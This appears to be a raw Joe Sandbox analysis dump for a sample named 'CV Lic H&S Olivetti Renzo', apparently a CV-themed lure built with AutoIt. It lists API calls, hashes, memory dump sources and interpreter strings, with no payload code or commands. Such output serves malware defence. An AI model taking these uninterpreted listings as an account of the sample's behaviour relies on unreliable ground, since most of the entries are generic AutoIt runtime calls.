                                                                                        • Instruction Fuzzy Hash: EF019D78A00209EFCB44DF98C5909AEF7F5FB88314F208699E919A7305D731AE41DB80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                        • Instruction ID: 4ecbec78ad0b0fca0604dcb2e517bdaebf419f2c918835d25dc9a6ace6ac4759
                                                                                        • Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
                                                                                        • Instruction Fuzzy Hash: F1019D78A00209EFCB48DF98C5909AEF7F5FB88310F208599E909A7745D731AE41DB80
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1707401369.00000000019F9000.00000040.00000020.00020000.00000000.sdmp, Offset: 019F9000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_19f9000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                        • Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
                                                                                        • Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
                                                                                        • Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48
                                                                                        APIs
                                                                                        • DeleteObject.GDI32(00000000), ref: 003DA2FE
                                                                                        • DeleteObject.GDI32(00000000), ref: 003DA310
                                                                                        • DestroyWindow.USER32 ref: 003DA31E
                                                                                        • GetDesktopWindow.USER32 ref: 003DA338
                                                                                        • GetWindowRect.USER32(00000000), ref: 003DA33F
                                                                                        • SetRect.USER32(?,00000000,00000000,000001F4,00000190), ref: 003DA480
                                                                                        • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000002), ref: 003DA490
                                                                                        • CreateWindowExW.USER32(00000002,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA4D8
                                                                                        • GetClientRect.USER32(00000000,?), ref: 003DA4E4
                                                                                        • CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 003DA51E
                                                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA540
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA553
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA55E
                                                                                        • GlobalLock.KERNEL32(00000000), ref: 003DA567
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000190,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA576
                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 003DA57F
                                                                                        • CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA586
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 003DA591
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,88C00000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA5A3
                                                                                        • OleLoadPicture.OLEAUT32(88C00000,00000000,00000000,0040D9BC,00000000), ref: 003DA5B9
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 003DA5C9
                                                                                        • CopyImage.USER32(000001F4,00000000,00000000,00000000,00002000), ref: 003DA5EF
                                                                                        • SendMessageW.USER32(?,00000172,00000000,000001F4), ref: 003DA60E
                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA630
                                                                                        • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 003DA81D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                                                                                        • String ID: $AutoIt v3$DISPLAY$static
                                                                                        • API String ID: 2211948467-2373415609
                                                                                        APIs
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 003ED2DB
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 003ED30C
                                                                                        • GetSysColor.USER32(0000000F), ref: 003ED318
                                                                                        • SetBkColor.GDI32(?,000000FF), ref: 003ED332
                                                                                        • SelectObject.GDI32(?,00000000), ref: 003ED341
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003ED36C
                                                                                        • GetSysColor.USER32(00000010), ref: 003ED374
                                                                                        • CreateSolidBrush.GDI32(00000000), ref: 003ED37B
                                                                                        • FrameRect.USER32(?,?,00000000), ref: 003ED38A
                                                                                        • DeleteObject.GDI32(00000000), ref: 003ED391
                                                                                        • InflateRect.USER32(?,000000FE,000000FE), ref: 003ED3DC
                                                                                        • FillRect.USER32(?,?,00000000), ref: 003ED40E
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003ED439
                                                                                          • Part of subcall function 003ED575: GetSysColor.USER32(00000012), ref: 003ED5AE
                                                                                          • Part of subcall function 003ED575: SetTextColor.GDI32(?,?), ref: 003ED5B2
                                                                                          • Part of subcall function 003ED575: GetSysColorBrush.USER32(0000000F), ref: 003ED5C8
                                                                                          • Part of subcall function 003ED575: GetSysColor.USER32(0000000F), ref: 003ED5D3
                                                                                          • Part of subcall function 003ED575: GetSysColor.USER32(00000011), ref: 003ED5F0
                                                                                          • Part of subcall function 003ED575: CreatePen.GDI32(00000000,00000001,00743C00), ref: 003ED5FE
                                                                                          • Part of subcall function 003ED575: SelectObject.GDI32(?,00000000), ref: 003ED60F
                                                                                          • Part of subcall function 003ED575: SetBkColor.GDI32(?,00000000), ref: 003ED618
                                                                                          • Part of subcall function 003ED575: SelectObject.GDI32(?,?), ref: 003ED625
                                                                                          • Part of subcall function 003ED575: InflateRect.USER32(?,000000FF,000000FF), ref: 003ED644
                                                                                          • Part of subcall function 003ED575: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003ED65B
                                                                                          • Part of subcall function 003ED575: GetWindowLongW.USER32(00000000,000000F0), ref: 003ED670
                                                                                          • Part of subcall function 003ED575: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003ED698
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 3521893082-0
                                                                                        APIs
                                                                                        • DestroyWindow.USER32 ref: 0039B98B
                                                                                        • DeleteObject.GDI32(00000000), ref: 0039B9CD
                                                                                        • DeleteObject.GDI32(00000000), ref: 0039B9D8
                                                                                        • DestroyIcon.USER32(00000000), ref: 0039B9E3
                                                                                        • DestroyWindow.USER32(00000000), ref: 0039B9EE
                                                                                        • SendMessageW.USER32(?,00001308,?,00000000), ref: 003FD2AA
                                                                                        • ImageList_Remove.COMCTL32(?,000000FF,?), ref: 003FD2E3
                                                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000), ref: 003FD711
                                                                                          • Part of subcall function 0039B9FF: InvalidateRect.USER32(?,00000000,00000001,?,?,?,0039B759,?,00000000,?,?,?,?,0039B72B,00000000,?), ref: 0039BA58
                                                                                        • SendMessageW.USER32 ref: 003FD758
                                                                                        • SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 003FD76F
                                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 003FD785
                                                                                        • ImageList_Destroy.COMCTL32(00000000), ref: 003FD790
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
                                                                                        • String ID: 0
                                                                                        • API String ID: 464785882-4108050209
                                                                                        APIs
                                                                                        • SetErrorMode.KERNEL32(00000001), ref: 003CDBD6
                                                                                        • GetDriveTypeW.KERNEL32(?,0041DC54,?,\\.\,0041DC00), ref: 003CDCC3
                                                                                        • SetErrorMode.KERNEL32(00000000,0041DC54,?,\\.\,0041DC00), ref: 003CDE29
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorMode$DriveType
                                                                                        • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                        • API String ID: 2907320926-4222207086
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: __wcsnicmp
                                                                                        • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                        • API String ID: 1038674560-86951937
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?,0041DC00), ref: 003E6449
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper
                                                                                        • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                                                                                        • API String ID: 3964851224-45149045
                                                                                        APIs
                                                                                        • GetSysColor.USER32(00000012), ref: 003ED5AE
                                                                                        • SetTextColor.GDI32(?,?), ref: 003ED5B2
                                                                                        • GetSysColorBrush.USER32(0000000F), ref: 003ED5C8
                                                                                        • GetSysColor.USER32(0000000F), ref: 003ED5D3
                                                                                        • CreateSolidBrush.GDI32(?), ref: 003ED5D8
                                                                                        • GetSysColor.USER32(00000011), ref: 003ED5F0
                                                                                        • CreatePen.GDI32(00000000,00000001,00743C00), ref: 003ED5FE
                                                                                        • SelectObject.GDI32(?,00000000), ref: 003ED60F
                                                                                        • SetBkColor.GDI32(?,00000000), ref: 003ED618
                                                                                        • SelectObject.GDI32(?,?), ref: 003ED625
                                                                                        • InflateRect.USER32(?,000000FF,000000FF), ref: 003ED644
                                                                                        • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 003ED65B
                                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 003ED670
                                                                                        • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 003ED698
                                                                                        • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 003ED6BF
                                                                                        • InflateRect.USER32(?,000000FD,000000FD), ref: 003ED6DD
                                                                                        • DrawFocusRect.USER32(?,?), ref: 003ED6E8
                                                                                        • GetSysColor.USER32(00000011), ref: 003ED6F6
                                                                                        • SetTextColor.GDI32(?,00000000), ref: 003ED6FE
                                                                                        • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 003ED712
                                                                                        • SelectObject.GDI32(?,003ED2A5), ref: 003ED729
                                                                                        • DeleteObject.GDI32(?), ref: 003ED734
                                                                                        • SelectObject.GDI32(?,?), ref: 003ED73A
                                                                                        • DeleteObject.GDI32(?), ref: 003ED73F
                                                                                        • SetTextColor.GDI32(?,?), ref: 003ED745
                                                                                        • SetBkColor.GDI32(?,?), ref: 003ED74F
                                                                                        Similarity
                                                                                        • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                                                                        • String ID:
                                                                                        • API String ID: 1996641542-0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 003EB7B0
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003EB7C1
                                                                                        • CharNextW.USER32(0000014E), ref: 003EB7F0
                                                                                        • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 003EB831
                                                                                        • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 003EB847
                                                                                        • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 003EB858
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 003EB875
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 003EB8C7
                                                                                        • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 003EB8DD
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 003EB90E
                                                                                        • _memset.LIBCMT ref: 003EB933
                                                                                        • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 003EB97C
                                                                                        • _memset.LIBCMT ref: 003EB9DB
                                                                                        • SendMessageW.USER32 ref: 003EBA05
                                                                                        • SendMessageW.USER32(?,00001074,?,00000001), ref: 003EBA5D
                                                                                        • SendMessageW.USER32(?,0000133D,?,?), ref: 003EBB0A
                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 003EBB2C
                                                                                        • GetMenuItemInfoW.USER32(?), ref: 003EBB76
                                                                                        • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 003EBBA3
                                                                                        • DrawMenuBar.USER32(?), ref: 003EBBB2
                                                                                        • SetWindowTextW.USER32(?,0000014E), ref: 003EBBDA
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                        • String ID: 0
                                                                                        • API String ID: 1073566785-4108050209
                                                                                        APIs
                                                                                        Similarity
                                                                                        • API ID: Window$Foreground
                                                                                        • String ID: ACTIVE$ALL$CLASS$H+C$HANDLE$INSTANCE$L+C$LAST$P+C$REGEXPCLASS$REGEXPTITLE$T+C$TITLE
                                                                                        • API String ID: 62970417-3904684051
                                                                                        APIs
                                                                                        • GetCursorPos.USER32(?), ref: 003E778A
                                                                                        • GetDesktopWindow.USER32 ref: 003E779F
                                                                                        • GetWindowRect.USER32(00000000), ref: 003E77A6
                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 003E7808
                                                                                        • DestroyWindow.USER32(?), ref: 003E7834
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 003E785D
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003E787B
                                                                                        • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 003E78A1
                                                                                        • SendMessageW.USER32(?,00000421,?,?), ref: 003E78B6
                                                                                        • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 003E78C9
                                                                                        • IsWindowVisible.USER32(?), ref: 003E78E9
                                                                                        • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 003E7904
                                                                                        • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 003E7918
                                                                                        • GetWindowRect.USER32(?,?), ref: 003E7930
                                                                                        • MonitorFromPoint.USER32(?,?,00000002), ref: 003E7956
                                                                                        • GetMonitorInfoW.USER32 ref: 003E7970
                                                                                        • CopyRect.USER32(?,?), ref: 003E7987
                                                                                        • SendMessageW.USER32(?,00000412,00000000), ref: 003E79F2
                                                                                        Similarity
                                                                                        • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                        • String ID: ($0$tooltips_class32
                                                                                        • API String ID: 698492251-4156429822
                                                                                        APIs
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0039A939
                                                                                        • GetSystemMetrics.USER32(00000007), ref: 0039A941
                                                                                        • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0039A96C
                                                                                        • GetSystemMetrics.USER32(00000008), ref: 0039A974
                                                                                        • GetSystemMetrics.USER32(00000004), ref: 0039A999
                                                                                        • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0039A9B6
                                                                                        • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0039A9C6
                                                                                        • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0039A9F9
                                                                                        • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0039AA0D
                                                                                        • GetClientRect.USER32(00000000,000000FF), ref: 0039AA2B
                                                                                        • GetStockObject.GDI32(00000011), ref: 0039AA47
                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 0039AA52
                                                                                          • Part of subcall function 0039B63C: GetCursorPos.USER32(000000FF), ref: 0039B64F
                                                                                          • Part of subcall function 0039B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0039B66C
                                                                                          • Part of subcall function 0039B63C: GetAsyncKeyState.USER32(00000001), ref: 0039B691
                                                                                          • Part of subcall function 0039B63C: GetAsyncKeyState.USER32(00000002), ref: 0039B69F
                                                                                        • SetTimer.USER32(00000000,00000000,00000028,0039AB87), ref: 0039AA79
                                                                                        Similarity
                                                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                        • String ID: AutoIt v3 GUI
                                                                                        • API String ID: 1458621304-248962490
                                                                                        APIs
                                                                                        • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003E3735
                                                                                        • RegCreateKeyExW.ADVAPI32(?,?,00000000,0041DC00,00000000,?,00000000,?,?), ref: 003E37A3
                                                                                        • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003E37EB
                                                                                        • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003E3874
                                                                                        • RegCloseKey.ADVAPI32(?), ref: 003E3B94
                                                                                        • RegCloseKey.ADVAPI32(00000000), ref: 003E3BA1
                                                                                        Similarity
                                                                                        • API ID: Close$ConnectCreateRegistryValue
                                                                                        • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                        • API String ID: 536824911-966354055
                                                                                        • Opcode ID: 040f3e5f43c4f7c013b52d0e2ef631272b28915402a4ae0c95082f223332d4a5
                                                                                        • Instruction ID: 41bd10e458033366036241b8862bbcea0744d68aa4e5961a52c75cf9a048c1eb
                                                                                        • Opcode Fuzzy Hash: 040f3e5f43c4f7c013b52d0e2ef631272b28915402a4ae0c95082f223332d4a5
                                                                                        • Instruction Fuzzy Hash: 37028A756047119FCB16EF25C885A2AB7E5FF88720F05859DF88A9B3A1CB30ED01CB85
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 003E6C56
                                                                                        • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 003E6D16
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                        • API String ID: 3974292440-719923060
                                                                                        • Opcode ID: 23b9622aca6369ae3f25a3fa6986009ce30ceb6e190c3c89aef0ef306d59e3ad
                                                                                        • Instruction ID: 738bd2caea9a1af78331aef7d9f414acd7be99c28c53c780b4e52042b2d39bf5
                                                                                        • Opcode Fuzzy Hash: 23b9622aca6369ae3f25a3fa6986009ce30ceb6e190c3c89aef0ef306d59e3ad
                                                                                        • Instruction Fuzzy Hash: 31A170702043919BCB16EF21C952AABB3A5BF94354F144A6DF8A65F7D2DB30EC06CB41
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 003BCF91
                                                                                        • __swprintf.LIBCMT ref: 003BD032
                                                                                        • _wcscmp.LIBCMT ref: 003BD045
                                                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 003BD09A
                                                                                        • _wcscmp.LIBCMT ref: 003BD0D6
                                                                                        • GetClassNameW.USER32(?,?,00000400), ref: 003BD10D
                                                                                        • GetDlgCtrlID.USER32(?), ref: 003BD15F
                                                                                        • GetWindowRect.USER32(?,?), ref: 003BD195
                                                                                        • GetParent.USER32(?), ref: 003BD1B3
                                                                                        • ScreenToClient.USER32(00000000), ref: 003BD1BA
                                                                                        • GetClassNameW.USER32(?,?,00000100), ref: 003BD234
                                                                                        • _wcscmp.LIBCMT ref: 003BD248
                                                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 003BD26E
                                                                                        • _wcscmp.LIBCMT ref: 003BD282
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                        • String ID: %s%u
                                                                                        • API String ID: 3119225716-679674701
                                                                                        • Opcode ID: 49288c2147cd6536641f10f8f17c111954c108adfbf788b5d6667fc50efca654
                                                                                        • Instruction ID: fcfa49eabfd4dbd53e84d8274a525bbe3fef6ef9896265cc997b446e485f5dcf
                                                                                        • Opcode Fuzzy Hash: 49288c2147cd6536641f10f8f17c111954c108adfbf788b5d6667fc50efca654
                                                                                        • Instruction Fuzzy Hash: E0A1F231604746AFD716DF64C884FEAB7A8FF44318F008929FA99D7590EB30E945CB91
                                                                                        APIs
                                                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 003BD8EB
                                                                                        • _wcscmp.LIBCMT ref: 003BD8FC
                                                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 003BD924
                                                                                        • CharUpperBuffW.USER32(?,00000000), ref: 003BD941
                                                                                        • _wcscmp.LIBCMT ref: 003BD95F
                                                                                        • _wcsstr.LIBCMT ref: 003BD970
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 003BD9A8
                                                                                        • _wcscmp.LIBCMT ref: 003BD9B8
                                                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 003BD9DF
                                                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 003BDA28
                                                                                        • _wcscmp.LIBCMT ref: 003BDA38
                                                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 003BDA60
                                                                                        • GetWindowRect.USER32(00000004,?), ref: 003BDAC9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
